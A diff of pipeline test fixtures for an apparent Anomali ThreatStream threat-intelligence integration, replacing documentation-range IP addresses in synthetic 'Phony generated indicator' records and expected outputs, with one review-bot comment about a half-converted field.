@@ -845,7 +845,7 @@
 "update_id": 2438380210,
 "date_last": "2020-10-09T18:32:30",
 "trusted_circle_ids": "591,520,447",
- "srcip": "203.0.113.244",
+ "srcip": "192.168.113.244",
 "detail2": "imported by user 337",
 "value_type": "ip",
 "source_feed_id": 2276,
@@ -892,7 +892,7 @@
 "update_id": 1095205177,
 "date_last": "2020-10-09T18:33:10",
 "trusted_circle_ids": "77,529",
- "srcip": "203.0.113.179",
+ "srcip": "192.168.113.179",
 "detail2": "imported by user 252",
 "value_type": "url",
 "source_feed_id": 241,
@@ -983,7 +983,7 @@
 "update_id": 3508566543,
 "date_last": "2020-10-09T18:33:22",
 "trusted_circle_ids": "396,599,717",
- "srcip": "203.0.113.134",
+ "srcip": "192.168.113.134",
 "detail2": "imported by user 723",
 "value_type": "url",
 "source_feed_id": 604,
@@ -1030,7 +1030,7 @@
 "update_id": 1462829026,
 "date_last": "2020-10-09T18:33:26",
 "trusted_circle_ids": "744,696",
- "srcip": "203.0.113.138",
+ "srcip": "192.168.113.138",
 "detail2": "imported by user 234",
 "value_type": "url",
 "source_feed_id": 1496,
@@ -1055,7 +1055,7 @@
 "update_id": 2449289149,
 "date_last": "2020-10-09T18:33:27",
 "trusted_circle_ids": "917",
- "srcip": "2001:db8:2793:5a49:6319:5ef9:504d:a9ff",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 814",
 "value_type": "url",
 "source_feed_id": 3466,
@@ -1168,7 +1168,7 @@
 "update_id": 3036608745,
 "date_last": "2020-10-09T18:33:48",
 "trusted_circle_ids": "551,416,152",
- "srcip": "192.0.2.71",
+ "srcip": "192.168.2.71",
 "detail2": "imported by user 179",
 "value_type": "url",
 "source_feed_id": 1654,
@@ -1214,7 +1214,7 @@
 "update_id": 2333575988,
 "date_last": "2020-10-09T18:33:57",
 "trusted_circle_ids": "221,16",
- "srcip": "203.0.113.183",
+ "srcip": "192.168.113.183",
 "detail2": "imported by user 313",
 "value_type": "ip",
 "source_feed_id": 3025,
@@ -1238,7 +1238,7 @@
 "update_id": 1805235807,
 "date_last": "2020-10-09T18:34:00",
 "trusted_circle_ids": "556,612",
- "srcip": "192.0.2.125",
+ "srcip": "192.168.2.125",
 "detail2": "imported by user 737",
 "value_type": "ip",
 "source_feed_id": 1868,
@@ -1263,7 +1263,7 @@
 "update_id": 1528754412,
 "date_last": "2020-10-09T18:34:00",
 "trusted_circle_ids": "506",
- "srcip": "203.0.113.54",
+ "srcip": "192.168.113.54",
 "detail2": "imported by user 346",
 "value_type": "url",
 "source_feed_id": 972,
@@ -1287,7 +1287,7 @@
 "update_id": 3734162957,
 "date_last": "2020-10-09T18:34:00",
 "trusted_circle_ids": "682,816",
- "srcip": "192.0.2.151",
+ "srcip": "192.168.2.151",
 "detail2": "imported by user 669",
 "value_type": "ip",
 "source_feed_id": 1469,
@@ -1400,7 +1400,7 @@
 "update_id": 1245189241,
 "date_last": "2020-10-09T18:34:17",
 "trusted_circle_ids": "85,930,472",
- "srcip": "192.0.2.13",
+ "srcip": "192.168.2.13",
 "detail2": "imported by user 416",
 "value_type": "url",
 "source_feed_id": 2351,
@@ -1556,7 +1556,7 @@
 "update_id": 2225250503,
 "date_last": "2020-10-09T18:34:41",
 "trusted_circle_ids": "459",
- "srcip": "203.0.113.106",
+ "srcip": "192.168.113.106",
 "detail2": "imported by user 406",
 "value_type": "ip",
 "source_feed_id": 3048,
@@ -1581,7 +1581,7 @@
 "update_id": 3685616690,
 "date_last": "2020-10-09T18:34:43",
 "trusted_circle_ids": "723,634",
- "srcip": "203.0.113.160",
+ "srcip": "192.168.113.160",
 "detail2": "imported by user 209",
 "value_type": "url",
 "source_feed_id": 3139,
@@ -1672,7 +1672,7 @@
 "update_id": 2000547096,
 "date_last": "2020-10-09T18:34:54",
 "trusted_circle_ids": "252,430",
- "srcip": "2001:db8:5bc2:f783:9677:ba10:5335:c6ed",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 494",
 "value_type": "url",
 "source_feed_id": 3338,
@@ -1763,7 +1763,7 @@
 "update_id": 3640800179,
 "date_last": "2020-10-09T18:35:04",
 "trusted_circle_ids": "47,99,408",
- "srcip": "203.0.113.111",
+ "srcip": "192.168.113.111",
 "detail2": "imported by user 748",
 "value_type": "url",
 "source_feed_id": 3698,
@@ -1825,14 +1825,14 @@
 "url": "http://ureumt8.example.org/ffey/ugwd?770694=x4r5wc-k",
 "country": "US",
 "date_first": "2020-10-09T18:44:01",
- "detail": "first_seen=2020-02-19T16:22:26,IP=203.0.113.146,qve,9hq86cl,mask=192.0.2.145,popularity=medium",
+ "detail": "first_seen=2020-02-19T16:22:26,IP=192.168.113.146,qve,9hq86cl,mask=192.168.2.145,popularity=medium",
 "lat": 34.0494,
 "source": "Phony generated indicator",
 "state": "active",
 "update_id": 3731087580,
 "date_last": "2020-10-09T18:44:01",
 "trusted_circle_ids": "102,209",
- "srcip": "192.0.2.245",
+ "srcip": "192.168.2.245",
 "detail2": "imported by user 174",
 "value_type": "url",
 "source_feed_id": 3818,
@@ -1857,7 +1857,7 @@
 "update_id": 1554620383,
 "date_last": "2020-10-09T18:44:04",
 "trusted_circle_ids": "504,886,919",
- "srcip": "2001:db8:9649:f32a:78d6:6c97:4fc0:b811",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 304",
 "value_type": "url",
 "source_feed_id": 2056,
@@ -1896,14 +1896,14 @@
 "classification": "public",
 "country": "RU",
 "date_first": "2020-10-09T18:44:27",
- "detail": "first_seen=2020-11-03T00:44:45,IP=203.0.113.133,a7ampeh8,3-9hj92,mask=203.0.113.177,popularity=high",
+ "detail": "first_seen=2020-11-03T00:44:45,IP=192.168.113.133,a7ampeh8,3-9hj92,mask=192.168.113.177,popularity=high",
 "lat": 53.1835,
 "source": "Phony generated indicator",
 "state": "active",
 "update_id": 1229235473,
 "date_last": "2020-10-09T18:44:27",
 "trusted_circle_ids": "35",
- "srcip": "203.0.113.178",
+ "srcip": "192.168.113.178",
 "detail2": "imported by user 517",
 "value_type": "ip",
 "source_feed_id": 1944,
@@ -1928,7 +1928,7 @@
 "update_id": 1840929082,
 "date_last": "2020-10-09T18:44:35",
 "trusted_circle_ids": "922,149",
- "srcip": "192.0.2.140",
+ "srcip": "192.168.2.140",
 "detail2": "imported by user 28",
 "value_type": "url",
 "source_feed_id": 1087,
@@ -1953,7 +1953,7 @@
 "update_id": 1804090348,
 "date_last": "2020-10-09T18:44:36",
 "trusted_circle_ids": "960,762",
- "srcip": "192.0.2.20",
+ "srcip": "192.168.2.20",
 "detail2": "imported by user 343",
 "value_type": "url",
 "source_feed_id": 1820,
@@ -1971,14 +1971,14 @@
 "url": "https://kfp3hgno1.example.net/-upwetee4/-e5xph-c?558c06wud=cvh0j95",
 "country": "IN",
 "date_first": "2020-10-09T18:44:37",
- "detail": "first_seen=2020-04-13T09:30:20,IP=203.0.113.221,ciib,o2d,mask=192.0.2.110,popularity=high",
+ "detail": "first_seen=2020-04-13T09:30:20,IP=192.168.113.221,ciib,o2d,mask=192.168.2.110,popularity=high",
 "lat": 10.7732,
 "source": "Phony generated indicator",
 "state": "active",
 "update_id": 3147523206,
 "date_last": "2020-10-09T18:44:37",
 "trusted_circle_ids": "370,288,713",
- "srcip": "2001:db8:6258:f48d:45ff:2bd1:5197:ad78",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 710",
 "value_type": "url",
 "source_feed_id": 2339,
@@ -2003,7 +2003,7 @@
 "update_id": 1290369427,
 "date_last": "2020-10-09T18:44:45",
 "trusted_circle_ids": "302,609,222",
- "srcip": "203.0.113.98",
+ "srcip": "192.168.113.98",
 "detail2": "imported by user 823",
 "value_type": "url",
 "source_feed_id": 3428,
@@ -2020,14 +2020,14 @@
 "classification": "public",
 "country": "CN",
 "date_first": "2020-10-09T18:44:47",
- "detail": "first_seen=2020-12-14T18:26:40,IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866,jsk,v2mi3w1,mask=192.0.2.15,popularity=medium",
+ "detail": "first_seen=2020-12-14T18:26:40,IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866,jsk,v2mi3w1,mask=192.168.2.15,popularity=medium",
 "lat": 39.9288,
 "source": "Phony generated indicator",
 "state": "active",
 "update_id": 1372709735,
 "date_last": "2020-10-09T18:44:47",
 "trusted_circle_ids": "785,379",
- "srcip": "2001:db8:2f2:8667:b63b:cb11:fd16:e637",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 879",
 "value_type": "ip",
 "source_feed_id": 2375,
@@ -2044,7 +2044,7 @@
 "classification": "private",
 "country": "HK",
 "date_first": "2020-10-09T18:44:50",
- "detail": "first_seen=2020-11-03T12:54:48,-eqch6ly,rzzt0o,mask=192.0.2.54,popularity=high",
+ "detail": "first_seen=2020-11-03T12:54:48,-eqch6ly,rzzt0o,mask=192.168.2.54,popularity=high",
 "lat": 22.25,
 "source": "Phony generated indicator",
 "state": "active",
@@ -2052,7 +2052,7 @@
 "date_last": "2020-10-09T18:44:50",
 "domain": "ekxj6l29.example.org",
 "trusted_circle_ids": "600",
- "srcip": "192.0.2.83",
+ "srcip": "192.168.2.83",
 "detail2": "imported by user 908",
 "value_type": "domain",
 "source_feed_id": 3770,
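Review bot: The `detail` value in @@ -2020 still carries `IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866` while the `mask=` on the same line and the `srcip` later in the same hunk were rewritten, so this record is only half-converted and the IPv4 and IPv6 addresses in it now follow different conventions. Either leave `detail` untouched throughout the file or convert this one too: `"detail": "first_seen=2020-12-14T18:26:40,IP=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,jsk,v2mi3w1,mask=192.168.2.15,popularity=medium",`. If the pipeline extracts addresses from `detail`, the expected output for this record should be re-checked whichever way it is resolved.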
@@ -2069,7 +2069,7 @@
 "classification": "private",
 "url": "https://ox5zm.example.net/w1g/cx3i6?e20oczdk8=qskggm6",
 "trusted_circle_ids": "739",
- "detail": "first_seen=2020-07-22T05:31:21,dq1kmq,ldv0d,mask=203.0.113.252,popularity=high",
+ "detail": "first_seen=2020-07-22T05:31:21,dq1kmq,ldv0d,mask=192.168.113.252,popularity=high",
 "date_first": "2020-10-09T18:44:50",
 "source": "Phony generated indicator",
 "state": "active",
@@ -2099,7 +2099,7 @@
 "update_id": 1060438545,
 "date_last": "2020-10-09T18:44:54",
 "trusted_circle_ids": "264,617",
- "srcip": "203.0.113.162",
+ "srcip": "192.168.113.162",
 "detail2": "imported by user 53",
 "value_type": "url",
 "source_feed_id": 2871,
@@ -2124,7 +2124,7 @@
 "update_id": 3265625226,
 "date_last": "2020-10-09T18:44:58",
 "trusted_circle_ids": "134",
- "srcip": "203.0.113.92",
+ "srcip": "192.168.113.92",
 "detail2": "imported by user 270",
 "value_type": "url",
 "source_feed_id": 249,
@@ -2141,14 +2141,14 @@
 "classification": "private",
 "country": "IN",
 "date_first": "2020-10-09T18:45:05",
- "detail": "first_seen=2020-02-24T00:46:01,IP=192.0.2.44,or81,2rukgaof3,mask=203.0.113.238,popularity=high",
+ "detail": "first_seen=2020-02-24T00:46:01,IP=192.168.2.44,or81,2rukgaof3,mask=192.168.113.238,popularity=high",
 "lat": 12.9184,
 "source": "Phony generated indicator",
 "state": "active",
 "update_id": 2103156062,
 "date_last": "2020-10-09T18:45:05",
 "trusted_circle_ids": "132",
- "srcip": "192.0.2.100",
+ "srcip": "192.168.2.100",
 "detail2": "imported by user 123",
 "value_type": "ip",
 "source_feed_id": 1483,
@@ -2175,7 +2175,7 @@
 "state": "active",
 "import_session_id": 2042,
 "value_type": "ip",
- "srcip": "192.0.2.16",
+ "srcip": "192.168.2.16",
 "org": "Level 3 Communications",
 "asn": "3356",
 "date_last": "2021-04-19T08:57:46",
@@ -2195,7 +2195,7 @@
 "source": "Phony generated indicator",
 "state": "active",
 "detail2": "imported by user 63",
- "srcip": "203.0.113.33",
+ "srcip": "192.168.113.33",
 "update_id": 3795650872,
 "value_type": "ip",
 "source_feed_id": 1348,
@@ -2215,7 +2215,7 @@
 "source": "Phony generated indicator",
 "state": "active",
 "detail2": "imported by user 167",
- "srcip": "192.0.2.180",
+ "srcip": "192.168.2.180",
 "update_id": 3989652203,
 "value_type": "ip",
 "source_feed_id": 2951,
@@ -2235,7 +2235,7 @@
 "source": "Phony generated indicator",
 "state": "active",
 "detail2": "imported by user 344",
- "srcip": "2001:db8:692e:9d99:e3f2:e52d:753a:d1e",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "update_id": 3037538927,
 "value_type": "ip",
 "source_feed_id": 2447,
@@ -2255,7 +2255,7 @@
 "source": "Phony generated indicator",
 "state": "active",
 "detail2": "imported by user 779",
- "srcip": "203.0.113.116",
+ "srcip": "192.168.113.116",
 "update_id": 3360316167,
 "value_type": "ip",
 "source_feed_id": 2504,
@@ -2275,7 +2275,7 @@
 "source": "Phony generated indicator",
 "state": "active",
 "detail2": "imported by user 547",
- "srcip": "192.0.2.73",
+ "srcip": "192.168.2.73",
 "update_id": 3997504378,
 "value_type": "ip",
 "source_feed_id": 344,
@@ -2297,7 +2297,7 @@
 "state": "active",
 "update_id": 1734126296,
 "maltype": "malware:uili",
- "srcip": "203.0.113.197",
+ "srcip": "192.168.113.197",
 "detail2": "imported by user 772",
 "value_type": "ip",
 "source_feed_id": 1431,
diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json
index ba3d9d67b82..417299c68da 100644
--- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json
+++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json
@@ -46,7 +46,7 @@
 "last_seen": "2020-10-08T12:24:42.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "203.0.113.39",
+ "ip": "192.168.113.39",
 "type": "domain-name",
 "url": {
 "domain": "tsvkkasbc.example.net"
@@ -55,7 +55,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138593984Z",
+ "ingested": "2021-12-13T08:39:43.809812200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -111,13 +111,13 @@
 "last_seen": "2020-10-08T12:24:42.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "192.0.2.111",
+ "ip": "192.168.2.111",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138603662Z",
+ "ingested": "2021-12-13T08:39:43.809823Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -175,13 +175,13 @@
 "last_seen": "2020-10-08T12:24:42.000Z",
 "provider": "Phony generated indicator",
 "confidence": "None",
- "ip": "203.0.113.98",
+ "ip": "192.168.113.98",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138606167Z",
+ "ingested": "2021-12-13T08:39:43.809830600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -235,7 +235,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138608130Z",
+ "ingested": "2021-12-13T08:39:43.809835Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -293,13 +293,13 @@
 "last_seen": "2020-10-09T18:49:37.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.96",
+ "ip": "192.168.113.96",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138609894Z",
+ "ingested": "2021-12-13T08:39:43.809839700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -357,13 +357,13 @@
 "last_seen": "2020-10-09T18:49:37.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.157",
+ "ip": "192.168.113.157",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138639680Z",
+ "ingested": "2021-12-13T08:39:43.809843800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -408,7 +408,7 @@
 "last_seen": "2020-10-09T18:14:43.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "192.0.2.19",
+ "ip": "192.168.2.19",
 "type": "domain-name",
 "url": {
 "domain": "frg.example.com"
@@ -417,7 +417,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138646252Z",
+ "ingested": "2021-12-13T08:39:43.809847900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -430,7 +430,7 @@
 "type=2",
 "first_seen=2020-01-07T01:38:35",
 "Botnet-WSPDZDY",
- "mask=203.0.113.180",
+ "mask=192.168.113.180",
 "popularity=low",
 "threat=gu3wn7"
 ]
@@ -478,7 +478,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138648737Z",
+ "ingested": "2021-12-13T08:39:43.809852100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -525,7 +525,7 @@
 "last_seen": "2020-10-09T18:30:13.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.163",
+ "ip": "192.168.113.163",
 "type": "url",
 "url": {
 "path": "/k4v7f/rsny",
@@ -539,7 +539,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138650540Z",
+ "ingested": "2021-12-13T08:39:43.809856200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -588,7 +588,7 @@
 "last_seen": "2020-10-09T18:30:13.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.217",
+ "ip": "192.168.113.217",
 "type": "url",
 "url": {
 "path": "/-g6/y1et4fbg",
@@ -602,7 +602,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138652363Z",
+ "ingested": "2021-12-13T08:39:43.809860200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -657,7 +657,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138654457Z",
+ "ingested": "2021-12-13T08:39:43.809864300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -713,7 +713,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138656491Z",
+ "ingested": "2021-12-13T08:39:43.809868400Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -762,7 +762,7 @@
 "last_seen": "2020-10-09T18:30:30.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.62",
+ "ip": "192.168.113.62",
 "type": "url",
 "url": {
 "path": "/9necc/0qv81npw",
@@ -776,7 +776,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138658355Z",
+ "ingested": "2021-12-13T08:39:43.809872800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -830,7 +830,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138660058Z",
+ "ingested": "2021-12-13T08:39:43.809876900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -887,7 +887,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138662212Z",
+ "ingested": "2021-12-13T08:39:43.809881Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -941,7 +941,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138666310Z",
+ "ingested": "2021-12-13T08:39:43.809885100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -997,7 +997,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138668153Z",
+ "ingested": "2021-12-13T08:39:43.809889200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1054,7 +1054,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138669856Z",
+ "ingested": "2021-12-13T08:39:43.809893200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1110,7 +1110,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138671559Z",
+ "ingested": "2021-12-13T08:39:43.809898400Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1166,7 +1166,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138673243Z",
+ "ingested": "2021-12-13T08:39:43.809902700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1221,7 +1221,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138674906Z",
+ "ingested": "2021-12-13T08:39:43.809907800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1276,7 +1276,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138676739Z",
+ "ingested": "2021-12-13T08:39:43.809911900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1286,7 +1286,7 @@
 "-tc0y",
 "6mp2f",
 "033j",
- "mask=203.0.113.47",
+ "mask=192.168.113.47",
 "threat=n922n81"
 ]
 },
@@ -1334,7 +1334,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138678522Z",
+ "ingested": "2021-12-13T08:39:43.809917400Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1382,7 +1382,7 @@
 "last_seen": "2020-10-09T18:31:34.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "203.0.113.228",
+ "ip": "192.168.113.228",
 "type": "url",
 "url": {
 "path": "/stf9kv/i9sn7c7",
@@ -1396,7 +1396,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138680346Z",
+ "ingested": "2021-12-13T08:39:43.809924700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1451,7 +1451,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138682049Z",
+ "ingested": "2021-12-13T08:39:43.809929Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1508,7 +1508,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138683842Z",
+ "ingested": "2021-12-13T08:39:43.809934300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1564,7 +1564,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138685636Z",
+ "ingested": "2021-12-13T08:39:43.809941900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1612,13 +1612,13 @@
 "last_seen": "2020-10-09T18:31:49.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "192.0.2.228",
+ "ip": "192.168.2.228",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138687349Z",
+ "ingested": "2021-12-13T08:39:43.809947900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1665,7 +1665,7 @@
 "last_seen": "2020-10-09T18:31:49.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "2001:db8:6186:eed0:6cbc:e2df:d062:6167",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "url",
 "url": {
 "path": "/3l7d8/r6-0i4dm",
@@ -1679,7 +1679,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138689002Z",
+ "ingested": "2021-12-13T08:39:43.809953200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1727,7 +1727,7 @@
 "last_seen": "2020-10-09T18:31:58.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.73",
+ "ip": "192.168.113.73",
 "type": "url",
 "url": {
 "path": "/g8vhdkptx/io5",
@@ -1741,7 +1741,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138690695Z",
+ "ingested": "2021-12-13T08:39:43.809957500Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1797,7 +1797,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138692399Z",
+ "ingested": "2021-12-13T08:39:43.809962600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1853,7 +1853,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138694082Z",
+ "ingested": "2021-12-13T08:39:43.809966800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1910,7 +1910,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138695735Z",
+ "ingested": "2021-12-13T08:39:43.809972700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -1966,7 +1966,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138697388Z",
+ "ingested": "2021-12-13T08:39:43.809979500Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2020,7 +2020,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138699352Z",
+ "ingested": "2021-12-13T08:39:43.809983700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2076,7 +2076,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138701145Z",
+ "ingested": "2021-12-13T08:39:43.809988900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2125,13 +2125,13 @@
 "last_seen": "2020-10-09T18:32:30.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.244",
+ "ip": "192.168.113.244",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138703219Z",
+ "ingested": "2021-12-13T08:39:43.810014300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2186,7 +2186,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138705032Z",
+ "ingested": "2021-12-13T08:39:43.810019100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2234,7 +2234,7 @@
 "last_seen": "2020-10-09T18:33:10.000Z",
 "provider": "Phony generated indicator",
 "confidence": "None",
- "ip": "203.0.113.179",
+ "ip": "192.168.113.179",
 "type": "url",
 "url": {
 "path": "/j0r45o29/minqwx",
@@ -2248,7 +2248,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138706775Z",
+ "ingested": "2021-12-13T08:39:43.810025100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2302,7 +2302,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138708449Z",
+ "ingested": "2021-12-13T08:39:43.810033Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2356,7 +2356,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138710212Z",
+ "ingested": "2021-12-13T08:39:43.810040600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2412,7 +2412,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138711905Z",
+ "ingested": "2021-12-13T08:39:43.810048100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2461,7 +2461,7 @@
 "last_seen": "2020-10-09T18:33:22.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.134",
+ "ip": "192.168.113.134",
 "type": "url",
 "url": {
 "path": "/gfr9mp/97sx6xll",
@@ -2475,7 +2475,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138713578Z",
+ "ingested": "2021-12-13T08:39:43.810052800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2531,7 +2531,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138715352Z",
+ "ingested": "2021-12-13T08:39:43.810057700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2580,7 +2580,7 @@
 "last_seen": "2020-10-09T18:33:26.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "203.0.113.138",
+ "ip": "192.168.113.138",
 "type": "url",
 "url": {
 "path": "/2igj2h-/2ofzb2i3l",
@@ -2594,7 +2594,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138717385Z",
+ "ingested": "2021-12-13T08:39:43.810062Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2641,7 +2641,7 @@
 "last_seen": "2020-10-09T18:33:27.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "2001:db8:2793:5a49:6319:5ef9:504d:a9ff",
